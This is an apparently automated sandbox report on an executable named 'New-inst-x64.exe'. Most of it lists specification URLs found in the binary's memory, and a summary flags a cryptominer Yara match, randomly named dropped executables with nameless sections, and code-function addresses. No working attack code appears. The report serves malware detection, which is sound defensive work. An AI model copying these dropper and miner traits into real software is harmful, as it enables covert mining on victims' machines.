      Source: New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gz
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gzhttps://nodejs.org/download/release
      Source: New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/win-x86/node.lib
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspector
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspectorFor
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.iconodedevtoolsFrontendUrldevtoolsFrontendUrlCompa
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      PE file contains section with special chars
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name:
      PE file has nameless sections
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C251940_3_09C25194
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0043646028_2_00436460
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0045A4C028_2_0045A4C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003F553B28_2_003F553B
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003F7B0028_2_003F7B00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00434CB028_2_00434CB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00411F5028_2_00411F50
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003FE03028_2_003FE030
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0044C05028_2_0044C050
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0042D07028_2_0042D070
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0044D07028_2_0044D070
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003F100028_2_003F1000
